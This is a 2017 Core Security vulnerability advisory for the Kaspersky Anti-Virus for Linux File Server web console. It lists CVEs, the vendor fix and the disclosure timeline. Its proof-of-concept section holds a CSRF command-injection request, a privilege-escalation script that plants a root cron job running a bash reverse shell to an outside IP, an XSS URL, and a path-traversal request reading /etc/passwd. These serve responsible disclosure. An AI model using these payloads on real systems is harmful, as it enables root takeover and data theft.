290 lines
No EOL
15 KiB
Text
290 lines
No EOL
15 KiB
Text
1. *Advisory Information*
|
|
|
|
Title: Kaspersky Anti-Virus File Server Multiple Vulnerabilities
|
|
Advisory ID: CORE-2017-0003
|
|
Advisory URL: http://www.coresecurity.com/advisories/Kaspersky-Anti-Virus-File-Server-Multiple-Vulnerabilities
|
|
Date published: 2017-06-28
|
|
Date of last update: 2017-06-28
|
|
Vendors contacted: Kaspersky
|
|
Release mode: Forced release
|
|
|
|
2. *Vulnerability Information*
|
|
|
|
Class: Improper Neutralization of Input During Web Page Generation
|
|
('Cross-site Scripting') [CWE-79], Cross-Site Request Forgery [CWE-352],
|
|
Improper Privilege Management [CWE-269], Improper Limitation of a
|
|
Pathname to a Restricted Directory [CWE-22]
|
|
Impact: Code execution, Security bypass, Information leak
|
|
Remotely Exploitable: Yes
|
|
Locally Exploitable: Yes
|
|
CVE Name: CVE-2017-9813, CVE-2017-9810, CVE-2017-9811, CVE-2017-9812
|
|
|
|
3. *Vulnerability Description*
|
|
|
|
From Kaspersky Lab's website:
|
|
"Large corporate networks that use file servers running on different
|
|
platforms can be a real headache when it comes to antivirus protection.
|
|
Kaspersky Anti-Virus for Linux File Server is part of our range of new
|
|
and refreshed products, solutions and services for heterogeneous
|
|
networks. It provides a superior protection with Samba server
|
|
integration and other features that can protect workstations and file
|
|
servers in even the most complex heterogeneous networks. It is also
|
|
certified VMware Ready and supports current versions of FreeBSD for
|
|
integrated, future-proof protection."
|
|
|
|
Multiple vulnerabilities were found in the Kaspersky Anti-Virus for
|
|
Linux File Server [2] Web Management Console. It is possible for a
|
|
remote attacker to abuse these vulnerabilities and gain command
|
|
execution as root.
|
|
|
|
4. *Vulnerable Packages*
|
|
|
|
. Kaspersky Anti-Virus for Linux File Server 8.0.3.297 [2]
|
|
Other products and versions might be affected, but they were not tested.
|
|
|
|
5. *Vendor Information, Solutions and Workarounds*
|
|
|
|
Kaspersky [1] published the following Maintenance Pack:
|
|
. Maintenance Pack 2 Critical Fix 4 (version 8.0.4.312):
|
|
https://support.kaspersky.com/13738/
|
|
|
|
6. *Credits*
|
|
|
|
This vulnerability was discovered and researched by Leandro Barragan
|
|
and Maximiliano Vidal from Core Security Consulting Services. The
|
|
publication of this advisory was coordinated by Alberto Solino from
|
|
Core Advisories Team.
|
|
|
|
7. *Technical Description / Proof of Concept Code*
|
|
|
|
Kaspersky Anti-virus for Linux File Server comes bundled with a Web
|
|
Management Console to monitor the application's status and manage its
|
|
operation.
|
|
|
|
One specific feature allows configuring shell scripts to be executed
|
|
when certain events occur. This functionality is vulnerable to
|
|
cross-site request forgery, allowing code execution in the context of
|
|
the web application as the kluser account. The vulnerability is
|
|
described in section 7.1.
|
|
|
|
Moreover, it is possible to elevate privileges from kluser to root by
|
|
abusing the quarantine functionality provided by the kav4fs-control
|
|
system binary. This is described in section 7.2.
|
|
|
|
Additional web application vulnerabilities were found, including a
|
|
reflected cross-site scripting vulnerability (7.3) and a path traversal
|
|
vulnerability (7.4).
|
|
|
|
7.1. *Cross-site Request Forgery leading to Remote Command Execution*
|
|
|
|
[CVE-2017-9810]: There are no Anti-CSRF tokens in any forms on the web
|
|
interface. This would allow an attacker to submit authenticated requests
|
|
when an authenticated user browses an attacker-controlled domain.
|
|
|
|
The following request will update the notification settings to run a
|
|
shell command when an object is moved to quarantine. For the full list
|
|
of events refer to the product's documentation. Note that it is possible
|
|
to add a script to all existing events in a single request, widening the
|
|
window of exploitation.
|
|
|
|
The proof-of-concept creates the file /tmp/pepperoni. Shell commands
|
|
are run as the lower privilege kluser.
|
|
|
|
Payload:
|
|
/-----
|
|
"notifier": {"Actions": [{"Command": "touch /tmp/pepperoni",
|
|
"EventName": 22, "Enable": true, "__VersionInfo": "1 0"}]
|
|
-----/
|
|
|
|
Request:
|
|
|
|
/-----
|
|
POST /cgi-bin/cgictl?action=setTaskSettings HTTP/1.1
|
|
Host: <server IP>:9080
|
|
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0)
|
|
Gecko/20100101 Firefox/52.0
|
|
Accept: application/json, text/javascript, */*
|
|
Accept-Language: en-US,en;q=0.5
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Referer: http://<server IP>:9080/
|
|
Content-Length: 3273
|
|
Cookie: wmc_useWZRDods=true; wmc_sid=690DE0005C5625A420255EFEBB3349F7;
|
|
wmc_full_stat=1;
|
|
wmc_logsSimpleMode=1;
|
|
wmc_backupSimpleMode=1; wmc_quaSimpleMode=1;
|
|
wmc_iconsole_lang=resource_en.js;
|
|
wmc_show_settings_descr=false;
|
|
iconsole_test; wmc_show_licence_descr=false
|
|
Connection: close
|
|
|
|
taskId=7&
|
|
settings=%7B%22ctime%22%3A%201490796963%2C%20%22notifier%22%3A%20%7B%22Actions%22%3A%20%5B%7B%22Command%22%3A%20%22touch%20%2Ftmp%2Fpepperoni%22%2C%20%22EventName%22%3A%2022%2C%20%22Enable%22%3A%20true%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%5D%2C%20%22CommonSmtpSettings%22%3A%20%7B%22DefaultRecipients%22%3A%20%5B%5D%2C%20%22InternalMailerSettings%22%3A%20%7B%22ConnectionTimeout%22%3A%2010%2C%20%22SmtpPort%22%3A%2025%2C%20%22SmtpQueueFolder%22%3A%20%22%2Fvar%2Fopt%2Fkaspersky%2Fkav4fs%2Fdb%2Fnotifier%22%2C%20%22SmtpServer%22%3A%20%22%22%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%22Mailer%22%3A%20%221%22%2C%20%22Sender%22%3A%20%22%22%2C%20%22SendmailPath%22%3A%20%22%2Fusr%2Fsbin%2Fsendmail%20-t%20-i%22%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%22EnableActions%22%3A%20true%2C%20%22EnableSmtp%22%3A%20false%2C%20%22SmtpNotifies%22%3A%20%5B%7B%22Body%22%3A%20%22%22%2C%20%22Enable%22%3A%20true%2C%20%22EventName%22%3A%201%2C%20%22Recipients%22%3A%20%5B%5D%2C%20%22Subject%22%3A%20%22Anti-Virus%20started%22%2C%20%22UseRecipientList%22%3A%202%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%7B%22Body%22%3A%20%22%22%2C%20%22Enable%22%3A%20true%2C%20%22EventName%22%3A%206%2C%20%22Recipients%22%3A%20%5B%5D%2C%20%22Subject%22%3A%20%22License%20error%22%2C%20%22UseRecipientList%22%3A%202%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%7B%22Body%22%3A%20%22%22%2C%20%22Enable%22%3A%20true%2C%20%22EventName%22%3A%207%2C%20%22Recipients%22%3A%20%5B%5D%2C%20%22Subject%22%3A%20%22Databases%20updated%22%2C%20%22UseRecipientList%22%3A%202%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%5D%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%22snmp%22%3A%20%7B%22MasterAgentXAddress%22%3A%20%22tcp%3Alocalhost%3A705%22%2C%20%22PingInterval%22%3A%2015%2C%20%22TrapSuite%22%3A%20%7B%22AVBasesAppliedEventEnable%22%3A%20true%2C%20%22AVBasesAreOutOfDateEventEnable%22%3A%20true%2C%20%22AVBasesAreTotallyOutOfDateEventEnable%22%3A%20true%2C%20%22AVBasesAttachedEventEnable%22%3A%20true%2C%20%22AVBasesIntegrityCheckFailedEventEnable%22%3A%20true%2C%20%22AVBasesRollbackCompletedEventEnable%22%3A%20true%2C%20%22AVBasesRollbackErrorEventEnable%22%3A%20true%2C%20%22ApplicationSettingsChangedEventEnable%22%3A%20true%2C%20%22ApplicationStartedEventEnable%22%3A%20true%2C%20%22LicenseErrorEventEnable%22%3A%20true%2C%20%22LicenseExpiredEventEnable%22%3A%20true%2C%20%22LicenseExpiresSoonEventEnable%22%3A%20true%2C%20%22LicenseInstalledEventEnable%22%3A%20true%2C%20%22LicenseNotInstalledEventEnable%22%3A%20true%2C%20%22LicenseNotRevokedEventEnable%22%3A%20true%2C%20%22LicenseRevokedEventEnable%22%3A%20true%2C%20%22ModuleNotDownloadedEventEnable%22%3A%20true%2C%20%22NothingToUpdateEventEnable%22%3A%20true%2C%20%22ObjectDeletedEventEnable%22%3A%20true%2C%20%22ObjectDisinfectedEventEnable%22%3A%20true%2C%20%22ObjectSavedToBackupEventEnable%22%3A%20true%2C%20%22ObjectSavedToQuarantineEventEnable%22%3A%20true%2C%20%22RetranslationErrorEventEnable%22%3A%20true%2C%20%22TaskStateChangedEventEnable%22%3A%20true%2C%20%22ThreatDetectedEventEnable%22%3A%20true%2C%20%22UpdateErrorEventEnable%22%3A%20true%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%22TrapsEnable%22%3A%20true%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%7D
|
|
&schedule=%7B%7D&skipCtimeCheck=true
|
|
|
|
-----/
|
|
|
|
7.2. *Privilege escalation due to excessive permissions*
|
|
|
|
[CVE-2017-9811]: The kluser is able to interact with the kav4fs-control
|
|
binary. By abusing the quarantine read and write operations, it is
|
|
possible to elevate the privileges to root.
|
|
|
|
The following proof-of-concept script adds a cron job that will be
|
|
executed as root.
|
|
|
|
/-----
|
|
# Make sure the application is running
|
|
/opt/kaspersky/kav4fs/bin/kav4fs-control --start-app
|
|
|
|
# Create cron job in /tmp
|
|
echo "* * * * * root /tmp/reverse.sh" > /tmp/badcron
|
|
|
|
# Sample reverse shell payload
|
|
cat > /tmp/reverse.sh << EOF
|
|
#!/bin/bash
|
|
bash -i >& /dev/tcp/172.16.76.1/8000 0>&1
|
|
EOF
|
|
chmod +x /tmp/reverse.sh
|
|
|
|
# Move the cron job to quarantine and grab the object ID
|
|
QUARANTINE_ID=$(/opt/kaspersky/kav4fs/bin/kav4fs-control -Q
|
|
--add-object /tmp/badcron | cut -d'=' -f2 | cut -d'.' -f1)
|
|
|
|
# Restore the file to /etc/cron.d
|
|
/opt/kaspersky/kav4fs/bin/kav4fs-control -Q --restore $QUARANTINE_ID
|
|
--file /etc/cron.d/implant
|
|
-----/
|
|
|
|
7.3. *Reflected cross-site scripting*
|
|
|
|
[CVE-2017-9813]: The scriptName parameter of the licenseKeyInfo action
|
|
method is vulnerable to cross-site scripting.
|
|
|
|
/-----
|
|
http://<server
|
|
IP>:9080/cgi-bin/cgictl?action=licenseKeyInfo&do_action=licenseKeyInfo&scriptName=</script><img+src%3dx+onerror%3d"alert(1)"%3b/>&active=&licenseKey=bla
|
|
-----/
|
|
|
|
7.4. *Path traversal*
|
|
|
|
[CVE-2017-9812]: The reportId parameter of the getReportStatus action
|
|
method can be abused to read arbitrary files with kluser privileges.
|
|
The following proof-of-concept reads the /etc/passwd file.
|
|
|
|
/-----
|
|
GET
|
|
/cgi-bin/cgictl?action=getReportStatus&reportId=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
|
|
HTTP/1.1
|
|
Host: <server IP>:9080
|
|
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0)
|
|
Gecko/20100101 Firefox/52.0
|
|
Accept: application/json, text/javascript, */*
|
|
Accept-Language: en-US,en;q=0.5
|
|
Referer: http://<server IP>:9080/
|
|
Cookie: iconsole_test; wmc_useWZRDods=true;
|
|
wmc_sid=99E61AFCD3EC96F5E349AB439DAE46C4; wmc_full_stat=1;
|
|
wmc_logsSimpleMode=1; wmc_backupSimpleMode=0; wmc_quaSimpleMode=1;
|
|
wmc_iconsole_lang=resource_en.js
|
|
Connection: close
|
|
-----/
|
|
|
|
8. *Report Timeline*
|
|
. 2017-04-03: Core Security sent an initial notification to Kaspersky,
|
|
including a draft advisory.
|
|
. 2017-04-03: Kaspersky confirmed reception of advisory and informed
|
|
they will submit it to the relevant technical team for validation and
|
|
replication.
|
|
. 2017-04-06: Kaspersky confirmed they could reproduce three out of
|
|
five reported vulnerabilities and asked us opinion on their
|
|
justifications about mitigating factors on the other two. They also said
|
|
they would inform us about a fix date in a few days.
|
|
. 2017-04-06: Core Security thanked the confirmation and sent
|
|
justification for one of the vulnerabilities questioned. Core Security
|
|
agreed on removing one reported vulnerability since it can be mitigated
|
|
via a product setting.
|
|
. 2017-04-25: Kaspersky confirmed the rest of the vulnerabilities
|
|
reported and are working on a fix. They said fixes will be released
|
|
"till the June, 30", and also said will inform us the exact dates by
|
|
the end of June.
|
|
. 2017-04-25: Core Security thanked the confirmation of the final
|
|
vulnerabilities list and asked for clarification about the release date.
|
|
. 2017-04-25: Kaspersky clarified they will release the fix by June
|
|
30th and will let us know the exact date by mid June.
|
|
. 2017-06-19: Kaspersky mentioned they would like to go ahead with the
|
|
publication on June 30th and also asked for CVEs.
|
|
. 2017-06-19: Core Security answer back proposing advisory publication
|
|
to be July 3rd in order to avoid advisory publication on a Friday. Also
|
|
asked for clarification about a fix dated June 14th found by Core
|
|
Security researchers and whether or not it fixes the vulnerabilities
|
|
reported.
|
|
. 2017-06-21: Kaspersky answered back stating the fix dated June 14th
|
|
is related to fixes for reported vulnerabilities.
|
|
. 2017-06-21: Core Security asked if the June 14th patch (ID 13738) is
|
|
fixing *all* the vulnerabilities reported in the current advisory. If
|
|
so Core Security will be releasing the advisory sooner than planned.
|
|
Reminded Kaspersky said they would release the fixes by June 30th.
|
|
. 2017-06-22: Core Security sent a draft advisory with the final CVE
|
|
IDs for each vulnerability.
|
|
. 2017-06-23: Kaspersky said they will clarify about patch 13738 ASAP
|
|
and also noted about a typo in the advisory's timeline.
|
|
. 2017-06-23: Core Security requested again we need clarification
|
|
around patch 13738 as soon as possible.
|
|
. 2017-06-26: Core Security reviewed the patch released in June 14th
|
|
and confirmed it addresses all the vulnerabilities reported. Core
|
|
Security informed Kaspersky this advisory will be published as a
|
|
FORCED release on Wednesday 28th.
|
|
. 2017-06-28: Advisory CORE-2017-0003 published.
|
|
|
|
9. *References*
|
|
|
|
[1] https://www.kaspersky.com
|
|
[2] https://support.kaspersky.com/linux_file80
|
|
|
|
10. *About CoreLabs*
|
|
|
|
CoreLabs, the research center of Core Security, is charged with
|
|
anticipating the future needs and requirements for information security
|
|
technologies.
|
|
We conduct our research in several important areas of computer security
|
|
including system vulnerabilities, cyber attack planning and simulation,
|
|
source code auditing, and cryptography. Our results include problem
|
|
formalization, identification of vulnerabilities, novel solutions and
|
|
prototypes for new technologies.
|
|
CoreLabs regularly publishes security advisories, technical papers,
|
|
project information and shared software tools for public use
|
|
at: http://corelabs.coresecurity.com.
|
|
|
|
11. *About Core Security*
|
|
|
|
Courion and Core Security have rebranded the combined company, changing
|
|
its name to Core Security, to reflect the company's strong commitment to
|
|
providing enterprises with market-leading, threat-aware, identity,
|
|
access and vulnerability management solutions that enable actionable
|
|
intelligence and context needed to manage security risks across the
|
|
enterprise. Core Security's analytics-driven approach to security
|
|
enables customers to manage access and identify vulnerabilities, in
|
|
order to minimize risks and maintain continuous compliance. Solutions
|
|
include Multi-Factor Authentication, Provisioning, Identity Governance
|
|
and Administration (IGA), Identity and Access Intelligence (IAI), and
|
|
Vulnerability Management (VM). The combination of these solutions
|
|
provides context and shared intelligence through analytics, giving
|
|
customers a more comprehensive view of their security posture so they
|
|
can make more informed, prioritized, and better security remediation
|
|
decisions.
|
|
|
|
Core Security is headquartered in the USA with offices and operations in
|
|
South America, Europe, Middle East and Asia. To learn more, contact Core
|
|
Security at (678) 304-4500 or info@coresecurity.com.
|
|
|
|
12. *Disclaimer*
|
|
|
|
The contents of this advisory are copyright (c) 2017 Core Security
|
|
and (c) 2017 CoreLabs, and are licensed under a Creative Commons
|
|
Attribution Non-Commercial Share-Alike 3.0 (United States) License:
|
|
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
|
|
|
|
13. *PGP/GPG Keys*
|
|
|
|
This advisory has been signed with the GPG key of Core Security
|
|
advisories team, which is available for download at
|
|
http://www.coresecurity.com/files/attachments/core_security_advisories.asc. |